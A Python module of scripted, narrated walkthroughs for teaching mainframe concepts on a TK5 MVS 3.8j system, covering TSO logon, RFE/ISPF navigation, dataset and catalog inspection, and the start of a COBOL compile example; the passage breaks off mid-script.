"""
Walkthrough Scripts

Autonomous walkthrough definitions for the guided mainframe education system.
These scripts define step-by-step actions with narration for teaching mainframe concepts.
"""

WALKTHROUGH_SCRIPTS = {
    "quick-demo": {
        "title": "30-Second Demo: ISPF Primary Menu",
        "steps": [
            {
                "title": "Connect to Mainframe",
                "control_plane": "vtam",
                "narration": "**Connecting to MVS TK5 via TN3270**\n\nEstablishing session to the VTAM entry point.",
                "actions": [{"type": "connect"}],
                "expect": ["VTAM", "Logon", "TK5", "MVS"],
                "display_seconds": 3,
            },
            {
                "title": "Authenticate",
                "control_plane": "tso",
                "narration": "**Logging in as HERC01**\n\nEntering userid and password. RACF verifies credentials.",
                "actions": [{"type": "tso_login"}],
                "expect": ["READY", "ISPF", "RFE", "TSOAPPLS"],
                "display_seconds": 4,
            },
            {
                "title": "Enter ISPF",
                "control_plane": "tso",
                "narration": "**Entering ISPF**\n\nNavigating to the ISPF Primary Option Menu — the main interactive interface.",
                "actions": [{"type": "enter_rfe"}, {"type": "wait", "seconds": 2}],
                "expect": ["ISPF", "primary", "option", "menu", "BROWSE", "EDIT"],
                "display_seconds": 5,
            },
            {
                "title": "ISPF Primary Option Menu",
                "control_plane": "tso",
                "narration": "**ISPF Primary Option Menu displayed.**\n\nThis is the central hub for interactive mainframe work:\n- **0** ISPF PARMS — terminal settings\n- **1** BROWSE — view datasets\n- **2** EDIT — modify source\n- **3** UTILITIES — dataset management\n- **X** EXIT — return to TSO\n\nDemo complete. Exiting cleanly.",
                "actions": [{"type": "wait", "seconds": 4}],
                "expect": ["ISPF", "primary", "option"],
                "display_seconds": 6,
            },
            {
                "title": "Exit ISPF",
                "control_plane": "tso",
                "narration": "**Exiting ISPF**\n\nPressing PF3 to return to TSO READY prompt.",
                "actions": [
                    {"type": "pf", "value": "3"}, {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"}, {"type": "wait", "seconds": 2},
                ],
                "expect": ["READY"],
                "display_seconds": 4,
            },
            {
                "title": "Logoff",
                "control_plane": "vtam",
                "narration": "**Clean exit**\n\nLogging off TSO. Identity unbound, returning to VTAM session fabric.",
                "actions": [{"type": "tso_logoff"}],
                "expect": ["LOGOFF", "VTAM", "LOGON"],
                "display_seconds": 4,
            },
        ],
    },
    "session-stack": {
        "title": "Session Stack: VTAM → TSO → ISPF → Datasets",
        "steps": [
            {
                "title": "Connect to Mainframe",
                "control_plane": "vtam",
                "narration": "**Control Plane: VTAM (Session Fabric)**\n\nWe begin by establishing a TN3270 connection. This creates a Logical Unit (LU) session in VTAM — the session fabric that exists independently of TCP/IP.\n\n**Key concept:** The session is managed by VTAM, not the network stack. When we connect, we are assigned an LU session that can outlive the TCP connection itself.",
                "actions": [{"type": "connect"}],
                "expect": [],
                "display_seconds": 5,
            },
            {
                "title": "VTAM Entry Screen",
                "control_plane": "vtam",
                "narration": "**Control Plane: VTAM (Session Fabric)**\n\nYou are at the VTAM entry screen — the session fabric layer. On TK5, this shows the MVS 3.8j splash.\n\n**Note:** On the first connection, the `Logon ===>` prompt may be missing. Press Enter and it will appear. On subsequent connections, the `Logon ===>` prompt is displayed immediately.\n\n**Broken Assumption:** *\"Ports define exposure.\"* On the mainframe, the session fabric outlives TCP connections. What you see here is not a \"service on a port\" — it's the session manager itself.\n\n**Findings Area F1 — Identity Binding:** Identity is not yet bound. You are an anonymous VTAM session. No userid, no authority — just a session handle.",
                "actions": [{"type": "wait", "seconds": 4}],
                "expect": ["VTAM", "Logon", "TK5", "MVS"],
                "display_seconds": 6,
            },
            {
                "title": "TSO Logon — Identity Binding",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO / RACF (Identity Binding & Authentication)**\n\nWe log in as HERC01. The login sequence traverses several screens:\n\n1. **Userid** — entered at the `Logon ===>` prompt, routes our VTAM session to TSO\n2. **Password** — verified by RACF (not TSO)\n3. **Broadcast messages** — system announcements, press Enter\n4. **Fortune screen** — press Enter to continue\n5. **TSO Applications Menu** — identity is now bound\n\n**Key concept:** VTAM acts as a session router. The transition from VTAM to TSO is a control-plane boundary crossing.\n\n**Broken Assumption:** *\"There is a root user.\"* There is no root. RACF distributes authority across profiles. The userid `HERC01` determines which profile set applies.\n\nAuthentication proves identity, but authentication is not authorization.",
                "actions": [{"type": "tso_login"}],
                "expect": ["READY", "ISPF", "IKJ56455I", "RFE", "TSOAPPLS"],
                "display_seconds": 6,
            },
            {
                "title": "Enter RFE (ISPF)",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO/RFE (Interactive Desktop)**\n\nAfter login, TK5 shows the TSO Applications Menu. We select option 1 (RFE) — the Review Front End, an ISPF-like productivity tool. RFE shows the Primary Option Menu with options: 1 (BROWSE), 2 (EDIT), R (RPF), 3 (UTILITIES), M (TSOAPPLS), and X (EXIT).\n\n**Broken Assumption:** *\"Processes are short-lived.\"* This TSO address space persists. Your identity context survives across panels, utilities, and program invocations.\n\n**Note:** TK5 uses RFE (not modern mainframe ISPF). There is no SDSF panel. Job output is viewed via TSO commands or the QUEUE spool browser.",
                "actions": [
                    {"type": "enter_rfe"}, {"type": "wait", "seconds": 2},
                ],
                "expect": ["ISPF", "OPTION", "BROWSE", "EDIT", "UTILITIES", "RFE"],
                "display_seconds": 6,
            },
            {
                "title": "ISPF Utilities — Dataset List (3.4)",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO/ISPF (Dataset Navigation)**\n\nWe use RFE option 3 (UTILITIES), then sub-option 4 (DSLIST) to list datasets. Datasets are the mainframe storage model — not a filesystem.\n\n**Key concept:** The mainframe does not have `/etc`, `/var`, or config files in the Unix sense. Everything is stored in datasets: cataloged, named objects with structure (PDS, sequential, VSAM). Access is controlled by RACF profiles, not filesystem permissions.\n\n**Findings Area F5 — Imported Assumptions:** The mainframe uses a flat catalog namespace with profile-based protection — not a filesystem hierarchy.",
                "actions": [
                    {"type": "home"}, {"type": "eraseeof"},
                    {"type": "string", "value": "3"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                    {"type": "home"}, {"type": "eraseeof"},
                    {"type": "string", "value": "4"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["DSLIST", "DATA SET", "DATASET"],
                "display_seconds": 5,
            },
            {
                "title": "Browse System Datasets",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO/ISPF (System Configuration)**\n\nWe enter `SYS1` as the dataset name level to browse system datasets. `SYS1.PARMLIB`, `SYS1.PROCLIB`, and `SYS1.LINKLIB` are critical system datasets.\n\n**Key concept:** System configuration lives in datasets like `SYS1.PARMLIB` — not in `/etc`. These datasets define system behavior: started tasks, security policy, IPL parameters. Access to them is controlled by RACF dataset profiles.\n\n**F4 — Policy Enforcement:** RACF enforces access to system datasets. Anyone who can UPDATE `SYS1.PARMLIB` can alter system behavior.",
                "actions": [{"type": "string", "value": "SYS1"}, {"type": "enter"}, {"type": "wait", "seconds": 3}],
                "expect": ["SYS1", "PARMLIB", "PROCLIB", "LINKLIB"],
                "display_seconds": 5,
            },
            {
                "title": "Exit ISPF → TSO Command Line",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO (Command Execution)**\n\nPF3 navigates back through the RFE panel stack: dataset list → Utilities → RFE Primary Menu. Then we type `X` at the RFE Primary Menu to exit and reach the TSO READY prompt.\n\n**Key concept:** Every command at TSO READY runs under the authority of HERC01. There is no `sudo` — your authority is determined by your RACF profile, not by how you invoke a command.\n\n**Note:** `X` is an RFE/ISPF command — it only works from the Primary Option Menu. At TSO READY, you use TSO commands like LOGOFF, STATUS, LISTALC.",
                "actions": [
                    {"type": "pf", "value": "3"}, {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"}, {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"}, {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"}, {"type": "wait", "seconds": 2},
                ],
                "expect": ["READY"],
                "display_seconds": 5,
            },
            {
                "title": "LISTALC — Identity Context",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO (Identity in Action)**\n\nThe `LISTALC STATUS` command shows every dataset allocated to this TSO session. These allocations reveal the identity context — what resources are bound to HERC01's address space.\n\n**Key concept:** Dataset allocations are the footprint of your identity. STEPLIB, ISPTLIB — these control which programs and panels are available. The allocations were established when you logged in, and they persist for the lifetime of your session.\n\n**F1 — Identity Binding:** Identity was bound at TSO logon. Here we see the *resource context* of that identity.",
                "actions": [{"type": "string", "value": "LISTALC STATUS"}, {"type": "enter"}, {"type": "wait", "seconds": 3}],
                "expect": ["LISTALC", "HERC01", "SYS1", "KEEP", "STEPLIB"],
                "display_seconds": 6,
            },
            {
                "title": "Logoff — Return to VTAM",
                "control_plane": "vtam",
                "narration": "**Control Plane: VTAM (Session Unbinding)**\n\nTo logoff: PF3 back through panels to the RFE main menu, then `X` or PF3 to exit to the TSO READY prompt, then type `LOGOFF`. The identity is unbound and we return to the anonymous VTAM session fabric.\n\n**Session lifecycle summary:**\n1. **VTAM** — anonymous session established\n2. **TSO** — identity bound via logon (HERC01)\n3. **ISPF** — interactive desktop, dataset navigation\n4. **RACF** — continuous authority enforcement\n5. **VTAM** — identity unbound, back to anonymous\n\n**Warning:** Never disconnect the terminal while logged in — it locks the userid. Recover with `/C U=userid` at the Hercules console.\n\n**Key takeaway:** Three control planes were traversed. Identity was bound at TSO, enforced by RACF, and the session fabric (VTAM) existed before and after authentication.",
                "actions": [{"type": "tso_logoff"}],
                "expect": ["LOGOFF", "VTAM", "LOGON"],
                "display_seconds": 8,
            },
        ],
    },
    "deferred-exec": {
        "title": "Deferred Execution: JCL → JES",
        "steps": [
            {
                "title": "Connect & Login",
                "control_plane": "tso",
                "narration": "**Setup: Establishing Identity**\n\nWe connect and log in to TSO. This walkthrough inspects the system configuration model — how MVS 3.8j defines its runtime through datasets, procedures, and catalogs.",
                "actions": [
                    {"type": "connect"},
                    {"type": "wait", "seconds": 2},
                    {"type": "tso_login"},
                ],
                "expect": ["READY", "ISPF", "IKJ", "RFE", "TSOAPPLS"],
                "display_seconds": 4,
            },
            {
                "title": "STATUS — Active Jobs",
                "control_plane": "jes",
                "narration": "**Control Plane: JES (Active Address Spaces)**\n\nWe exit the TSO Applications Menu (PF3) to reach the TSO READY prompt, then run `STATUS` to show active jobs and sessions. On TK5 MVS 3.8j, there is no SDSF — we use TSO commands to inspect JES.\n\n**Broken Assumption:** *\"Work executes immediately.\"* On the mainframe, work is *declared* via JCL, *queued* by JES, and *scheduled* by the system.\n\n**Key concept:** These address spaces may have been running since IPL. The identity context bound to each one was set at startup and persists for the lifetime of the address space.",
                "actions": [
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "STATUS"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["STATUS", "JOB", "HERC", "EXECUTING", "READY"],
                "display_seconds": 6,
            },
            {
                "title": "Browse JCL — SYS2.JCLLIB",
                "control_plane": "jes",
                "narration": "**Control Plane: JES (Job Declaration)**\n\nWe enter RFE to browse `SYS2.JCLLIB` — the JCL library on TK5. JCL (Job Control Language) *declares* work: what programs to run, what datasets to use, what resources to allocate.\n\n**Key concept:** JCL is a declaration, not a script. It tells JES what to do, but JES decides *when* to do it. The gap between submission and execution is a security-relevant window.\n\n**F3 — Deferred Execution:** Everything in JES executes later than expected.",
                "actions": [
                    {"type": "enter_rfe"},
                    {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "1"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                    {"type": "home"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "string", "value": "SYS2"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "string", "value": "JCLLIB"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "tab"},
                    {"type": "eraseeof"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["SYS2", "JCLLIB", "MEMBER", "NAME"],
                "display_seconds": 6,
            },
            {
                "title": "View a JCL Job",
                "control_plane": "jes",
                "narration": "**Control Plane: JES (Job Structure)**\n\nEach member in `SYS2.JCLLIB` is a complete JCL job. A job has:\n- **JOB card** — identity, class, priority\n- **EXEC statements** — programs to run\n- **DD statements** — dataset allocations\n\n**Key concept:** The JOB card carries the submitter's identity. When JES executes this job, RACF evaluates every resource access against that identity — even if the submitter has logged off.\n\n**F3 — Deferred Execution:** The identity bound at submission time governs execution.",
                "actions": [
                    {"type": "wait", "seconds": 4},
                ],
                "expect": ["JOB", "EXEC", "DD", "MEMBER"],
                "display_seconds": 7,
            },
            {
                "title": "Return to TSO & Check Output",
                "control_plane": "jes",
                "narration": "**Control Plane: JES (Job Output)**\n\nWe return to TSO and use the `OUTPUT` command to check job output. On TK5, job output is viewed via TSO commands — not SDSF.\n\n**Key concept:** JES output is the audit trail of deferred execution. The job's identity, class, return code, and output are all preserved. This is evidence of who submitted what, and when it ran.",
                "actions": [
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "OUTPUT"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["OUTPUT", "READY", "NO OUTPUT"],
                "display_seconds": 6,
            },
            {
                "title": "Logoff",
                "control_plane": "vtam",
                "narration": "**Summary: Deferred Execution**\n\nJES demonstrates that the mainframe separates work *declaration* from work *execution*:\n\n1. **Identity persists:** The submitter's identity governs execution\n2. **Authority is evaluated at submission:** RACF checks happen when the job is submitted\n3. **Audit trail exists:** Every job's identity, input, and output are preserved in JES\n\nOn the mainframe, you must ask: \"What work was declared but hasn't run yet? Under whose authority will it run?\"\n\n**Warning:** Never disconnect the terminal while logged in \u2014 it locks the userid. Recover with `/C U=userid` at the Hercules console.",
                "actions": [{"type": "tso_logoff"}],
                "expect": ["LOGOFF", "VTAM"],
                "display_seconds": 6,
            },
        ],
    },
    "system-inspection": {
        "title": "System Inspection: Configuration & Procedures",
        "steps": [
            {
                "title": "Connect & Login to TSO",
                "control_plane": "tso",
                "narration": "**Setup: Establishing Identity**\n\nWe connect and log in to TSO. This walkthrough inspects the system configuration model — how MVS 3.8j defines its runtime through datasets, procedures, and catalogs.",
                "actions": [
                    {"type": "connect"},
                    {"type": "wait", "seconds": 2},
                    {"type": "tso_login"},
                ],
                "expect": ["READY", "ISPF", "IKJ", "RFE", "TSOAPPLS"],
                "display_seconds": 4,
            },
            {
                "title": "TSO STATUS — Active Sessions",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO (Session Discovery)**\n\nWe exit the TSO Applications Menu (PF3) to reach the TSO READY prompt, then run `STATUS`. This command shows active jobs and TSO sessions. Each represents a bound identity — an address space with a userid attached.\n\n**Key concept:** Unlike `who` on Unix, TSO STATUS shows persistent address spaces. These sessions may have been active for hours or days.",
                "actions": [
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "STATUS"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 2},
                ],
                "expect": ["STATUS", "HERC", "LOGON", "READY"],
                "display_seconds": 5,
            },
            {
                "title": "TSO TIME — System Clock",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO (System Context)**\n\nThe `TIME` command shows the system clock. Every command you execute runs under your bound identity.\n\n**Key concept:** There is no `sudo`. When HERC01 types any command, RACF evaluates authority. Authority is continuous, not one-time.",
                "actions": [
                    {"type": "string", "value": "TIME"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 2},
                ],
                "expect": ["TIME", "READY"],
                "display_seconds": 5,
            },
            {
                "title": "Enter RFE (ISPF)",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO/RFE (Interactive Desktop)**\n\nWe enter RFE — the interactive development environment on TK5 MVS 3.8j.\n\n**RFE Options on TK5:**\n- **Option 1** — BROWSE (read-only view)\n- **Option 2** — EDIT (source editing)\n- **Option 3** — UTILITIES (dataset management)\n- **Option R** — RPF (Browse, Edit, Reset, PDS with RPF)\n\nRFE is where COBOL programmers spend most of their time: editing source, browsing JCL, and submitting jobs.",
                "actions": [
                    {"type": "enter_rfe"},
                    {"type": "wait", "seconds": 2},
                ],
                "expect": ["ISPF", "OPTION", "BROWSE", "EDIT", "UTILITIES", "RFE"],
                "display_seconds": 4,
            },
            {
                "title": "Browse SYS1.PROCLIB — System Procedures",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO/ISPF (System Configuration)**\n\nWe use RFE option 1 (BROWSE) to examine `SYS1.PROCLIB` — the library of started task procedures. Every address space on the system is defined by a PROC in this library.\n\n**Broken Assumption:** *\"Services are configured in config files.\"* On the mainframe, services are defined as JCL procedures in datasets. There is no `/etc/init.d` — there are PROCs.",
                "actions": [
                    {"type": "string", "value": "1"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                    {"type": "home"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "string", "value": "SYS1"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "string", "value": "PROCLIB"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "tab"},
                    {"type": "eraseeof"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["SYS1", "PROCLIB", "MEMBER", "NAME"],
                "display_seconds": 6,
            },
            {
                "title": "Return to TSO",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO/ISPF**\n\nWe return through RFE panels. The session persists — identity still bound, address space still alive.",
                "actions": [
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                ],
                "expect": ["READY"],
                "display_seconds": 4,
            },
            {
                "title": "Logoff",
                "control_plane": "vtam",
                "narration": "**Summary: System Inspection**\n\n1. **TSO STATUS** revealed active sessions — each with a bound identity\n2. **Every command** executes under your identity — no sudo, no elevation\n3. **SYS1.PROCLIB** defines the system's services — access = control\n4. **RACF enforces** who can read, update, or alter system configuration\n\n**Warning:** Never disconnect the terminal while logged in — it locks the userid. Recover with `/C U=userid` at the Hercules console.",
                "actions": [{"type": "tso_logoff"}],
                "expect": ["LOGOFF", "VTAM"],
                "display_seconds": 7,
            },
        ],
    },
    "auth-model": {
        "title": "Authorization Model: RACF",
        "steps": [
            {
                "title": "Connect & Login to TSO",
                "control_plane": "tso",
                "narration": "**Setup: Establishing Identity for RACF Demonstration**\n\nWe connect and log in to demonstrate the RACF authorization model. RACF is not a subsystem you \"enter\" — it is the continuous authorization engine that every other subsystem queries.",
                "actions": [
                    {"type": "connect"},
                    {"type": "wait", "seconds": 2},
                    {"type": "tso_login"},
                ],
                "expect": ["READY", "ISPF", "IKJ", "RFE", "TSOAPPLS"],
                "display_seconds": 4,
            },
            {
                "title": "LISTALC — Session Resource Context",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO (Identity in Action)**\n\nWe exit the TSO Applications Menu (PF3) to reach the TSO READY prompt, then run `LISTALC STATUS` which shows every dataset allocated to this TSO session. These allocations reveal the identity context.\n\n**Key concept:** Your RACF profile is the source of truth for your identity. Every subsystem queries RACF to determine what you may do.",
                "actions": [
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "LISTALC STATUS"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 2},
                ],
                "expect": ["LISTALC", "SYS1", "KEEP", "STEPLIB", "ALLOC"],
                "display_seconds": 6,
            },
            {
                "title": "LISTCAT — Dataset Catalog Entries",
                "control_plane": "racf",
                "narration": "**Control Plane: RACF (Resource Protection)**\n\n`LISTCAT` shows catalog entries. The catalog is the namespace — but access is controlled by RACF profiles.\n\n**Broken Assumption:** *\"There is a root user.\"* Even the most privileged user is governed by profiles — authority is distributed, not concentrated.",
                "actions": [
                    {"type": "string", "value": "LISTCAT ENT('SYS1.PARMLIB')"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 2},
                ],
                "expect": ["LISTCAT", "SYS1", "PARMLIB", "NONVSAM", "VOLSER"],
                "display_seconds": 6,
            },
            {
                "title": "PROFILE — TSO Session Profile",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO (Identity Attributes)**\n\nThe `PROFILE` command shows your TSO session settings: PREFIX (your default HLQ), message class, etc.\n\n**Key concept:** The PREFIX determines your default dataset high-level qualifier. Unqualified names are resolved relative to your identity's PREFIX.",
                "actions": [
                    {"type": "string", "value": "PROFILE"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 2},
                ],
                "expect": ["PROFILE", "PREFIX", "HERC01", "CHAR"],
                "display_seconds": 6,
            },
            {
                "title": "Logoff",
                "control_plane": "vtam",
                "narration": "**Summary: RACF Authorization Model**\n\n1. **RACF is continuous:** Every resource access triggers a RACF check\n2. **Profiles, not roles:** Access is defined per-resource, not per-role\n3. **Authority is distributed:** No single account has unconditional access\n4. **ICH messages are evidence:** Every authorization decision is logged\n\n**Warning:** Never disconnect the terminal while logged in — it locks the userid. Recover with `/C U=userid` at the Hercules console.",
                "actions": [{"type": "tso_logoff"}],
                "expect": ["LOGOFF", "VTAM"],
                "display_seconds": 7,
            },
        ],
    },
    "dataset-model": {
        "title": "Dataset Model: PDS, Members & Catalogs",
        "steps": [
            {
                "title": "Connect & Login",
                "control_plane": "tso",
                "narration": "**Setup: Establishing Identity**\n\nWe connect and log in to TSO. This walkthrough explores the MVS 3.8j storage model — datasets, partitioned data sets (PDS), members, and the catalog structure.",
                "actions": [
                    {"type": "connect"},
                    {"type": "wait", "seconds": 2},
                    {"type": "tso_login"},
                ],
                "expect": ["READY", "ISPF", "IKJ", "RFE", "TSOAPPLS"],
                "display_seconds": 4,
            },
            {
                "title": "Enter RFE (ISPF)",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO/RFE (Dataset Interface)**\n\nWe enter RFE. Unlike a Unix filesystem, the mainframe uses a flat catalog namespace. Datasets are named objects — not files in directories.\n\n**Broken Assumption:** *\"There is a filesystem hierarchy.\"* The mainframe has no `/home`, `/etc`, `/var`. Datasets are named with dot-separated qualifiers (e.g. `SYS1.PARMLIB`).",
                "actions": [
                    {"type": "enter_rfe"},
                    {"type": "wait", "seconds": 2},
                ],
                "expect": ["ISPF", "OPTION", "BROWSE", "EDIT", "UTILITIES", "RFE"],
                "display_seconds": 5,
            },
            {
                "title": "Dataset List — User Datasets",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO/ISPF (User Dataset Namespace)**\n\nWe navigate to RFE option 3 (UTILITIES), then sub-option 4 (DSLIST) and list datasets under `HERC01`. The high-level qualifier (HLQ) is identity-driven.",
                "actions": [
                    {"type": "string", "value": "3"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                    {"type": "string", "value": "4"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                    {"type": "string", "value": "HERC01"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["HERC01", "DSLIST", "DATA SET"],
                "display_seconds": 6,
            },
            {
                "title": "System Dataset Namespace",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO/ISPF (System Namespace)**\n\nNow we list `SYS1` datasets — the system namespace. `SYS1.PARMLIB` (config), `SYS1.PROCLIB` (services), `SYS1.LINKLIB` (programs).\n\n**Key concept:** There is no `/etc/init.d` or `systemd`. System configuration lives in datasets.",
                "actions": [
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "home"},
                    {"type": "tab"},
                    {"type": "eraseeof"},
                    {"type": "string", "value": "SYS1"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["SYS1", "PARMLIB", "PROCLIB"],
                "display_seconds": 6,
            },
            {
                "title": "Browse PDS Members — SYS1.PARMLIB",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO/ISPF (PDS Structure)**\n\nWe go back and use RFE option 1 (BROWSE) to open `SYS1.PARMLIB`. A Partitioned Data Set (PDS) is like a directory with members — each member is a named record.\n\n**Broken Assumption:** *\"Config files are in /etc.\"* On the mainframe, you must know which PDS contains the configuration and which member is active.",
                "actions": [
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "1"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                    {"type": "home"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "string", "value": "SYS1"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "string", "value": "PARMLIB"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "tab"},
                    {"type": "eraseeof"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["SYS1", "PARMLIB", "MEMBER", "NAME"],
                "display_seconds": 7,
            },
            {
                "title": "Catalog Structure — LISTCAT",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO (Catalog Discovery)**\n\nWe return to TSO and use `LISTCAT` to examine catalog entries. The catalog maps dataset names to physical DASD locations.\n\n**Key concept:** The catalog is the namespace. RACF profiles control who can access each cataloged dataset.",
                "actions": [
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "LISTCAT ENT('SYS1.LINKLIB')"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["LISTCAT", "SYS1", "LINKLIB", "NONVSAM"],
                "display_seconds": 7,
            },
            {
                "title": "Logoff",
                "control_plane": "vtam",
                "narration": "**Summary: Dataset Model**\n\n1. **No filesystem hierarchy:** The mainframe uses a flat catalog namespace with dot-separated qualifiers\n2. **PDS = directory:** Partitioned Data Sets contain named members\n3. **HLQ = identity:** Your high-level qualifier ties datasets to your identity\n4. **Catalogs = namespace:** The catalog maps names to physical volumes\n5. **RACF = access control:** Dataset profiles determine who can read, write, or alter\n\n**Warning:** Never disconnect the terminal while logged in — it locks the userid. Recover with `/C U=userid` at the Hercules console.",
                "actions": [{"type": "tso_logoff"}],
                "expect": ["LOGOFF", "VTAM"],
                "display_seconds": 8,
            },
        ],
    },
    "cobol-basics": {
        "title": "COBOL Compile & Execute on MVS",
        "steps": [
            {
                "title": "Connect & Login",
                "control_plane": "tso",
                "narration": "**COBOL Compile-Link-Go on TK5/MVS 3.8j**\n\nWe will write a COBOL program, embed it in JCL, submit it to JES, and verify execution output.\n\n**Key concept:** On MVS, source lives in PDS members — not files. Compilation is declared in JCL and executed as a batch job under the submitter's identity. This is **deferred execution**.\n\nThe compile-link-go lifecycle:\n1. Write source → PDS member\n2. Write JCL → declares compile/link/go steps\n3. Submit → JES queues the job\n4. JES executes under submitter identity\n5. Output → spool (permanent audit record)",
                "actions": [{"type": "connect"}, {"type": "wait", "seconds": 2}, {"type": "tso_login"}],
                "expect": ["READY", "ISPF", "IKJ", "RFE", "TSOAPPLS"],
                "display_seconds": 6,
            },
            {
                "title": "Allocate COBOL Source PDS",
                "control_plane": "tso",
                "narration": "**Allocate a PDS for our COBOL source**\n\nBefore we can write code, we need a dataset to store it. On MVS, you allocate a Partitioned Data Set (PDS) — a container that holds named members.\n\n`ALLOC DA('HERC01.COBOL.SOURCE') NEW SPACE(5,5) TRACKS DIR(5) RECFM(F,B) LRECL(80) BLKSIZE(3200)`\n\n- **DA** — dataset name (bound to our userid)\n- **SPACE(5,5)** — 5 tracks primary, 5 secondary\n- **LRECL(80)** — 80-byte fixed records (COBOL card format)\n- **DIR(5)** — directory blocks for member index\n\n**Trust implication:** RACF grants us CREATE authority under our HLQ (`HERC01.*`). The dataset inherits our identity.",
                "actions": [
                    {"type": "enter_rfe"}, {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"}, {"type": "wait", "seconds": 1},
                    {"type": "pf", "value": "3"}, {"type": "wait", "seconds": 1},
                    {"type": "string", "value": "ALLOC DA('HERC01.COBOL.SOURCE') NEW SPACE(5,5) TRACKS DIR(5) RECFM(F,B) LRECL(80) BLKSIZE(3200)"},
                    {"type": "enter"}, {"type": "wait", "seconds": 3},
                ],
                "expect": ["READY", "ALLOCATED", "HERC01"],
                "display_seconds": 8,
            },
            {
                "title": "Write COBOL Program — HELLO Member",
                "control_plane": "tso",
                "narration": "**Writing COBOL source into a PDS member**\n\nWe use the TSO `EDIT` command to create member `HELLO` in our PDS. The line-mode editor lets us input source line by line.\n\n**COBOL Column Rules:**\n- Cols 1-6: Sequence numbers (optional)\n- Col 7: `*` = comment\n- Cols 8-11: Area A (division/paragraph names)\n- Cols 12-72: Area B (statements)\n\nOur program:\n```\nIDENTIFICATION DIVISION.\nPROGRAM-ID. HELLO.\nPROCEDURE DIVISION.\n    DISPLAY 'HELLO FROM HERC01'.\n    STOP RUN.\n```\n\nMinimal but complete. The DISPLAY verb writes to SYSOUT — we'll see it in job output.",
                "actions": [
                    {"type": "string", "value": "EDIT 'HERC01.COBOL.SOURCE(HELLO)' DATA NONUM"},
                    {"type": "enter"}, {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "       IDENTIFICATION DIVISION."},
                    {"type": "enter"}, {"type": "wait", "seconds": 1},
